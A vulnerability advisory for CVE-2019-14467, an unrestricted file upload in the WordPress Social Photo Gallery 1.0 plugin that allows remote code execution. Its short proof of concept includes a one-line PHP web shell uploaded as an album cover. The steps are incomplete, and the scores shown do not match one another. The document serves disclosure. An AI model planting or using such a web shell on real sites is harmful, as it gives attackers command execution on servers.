WordPress Social Photo Gallery 1.0 Remote Code Execution

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

============================================= PRESTIGIA SEGURIDAD ALERT 2019-001 - Original release date: July 31, 2019 - Last revised: November 13, 2019 - Discovered by: Prestigia Seguridad - Severity: 7,5/10 (CVSS Base Score) - CVE-ID: CVE-2019-14467 ============================================= I. VULNERABILITY ------------------------- WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution II. BACKGROUND ------------------------- Social Gallery is the ultimate lightbox plugin for WordPress. Your images deserve to be experienced and shared, to spark a response as they travel the social web, and to work for you by generating more fans and more Likes for your content. III. DESCRIPTION ------------------------- The version of WordPress Plugin Social Photo Gallery is affected by a Remote Code Execution vulnerability. The application does not check the extension when a imagen of a album is uploaded, resulting in a execution of php code. To exploit the vulnerability only is needed create a album in the application and attach a malicious php file in the cover photo album. IV. PROOF OF CONCEPT ------------------------- 1. Create a .php archive (cmd.php): <?php system($_GET['cmd']); ?> 2. Click Add Album, select the name, for example "demo" and in the "Cover Photo" select the cmd.php file. 3. Load the next URL and magic: V. BUSINESS IMPACT ------------------------- Execute local commands in the server result from these attacks. VI. SYSTEMS AFFECTED ------------------------- WordPress Plugin Social Photo Gallery 1.0 VII. SOLUTION ------------------------- The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG VIII. REFERENCES ------------------------- https://wordpress.org/plugins/social-photo-gallery/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Prestigia Seguridad Email: info@prestigiaonline.com X. REVISION HISTORY ------------------------- July 31, 2019 1: Initial release November 13, 2019 2: Revision to send to lists XI. DISCLOSURE TIMELINE ------------------------- July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad July 31, 2019 2: Email to vendor without response August 15, 2019 3: Second email to vendor without response November 13, 2019 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Prestigia Seguridad https://seguridad.prestigia.es/

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com


Back to Top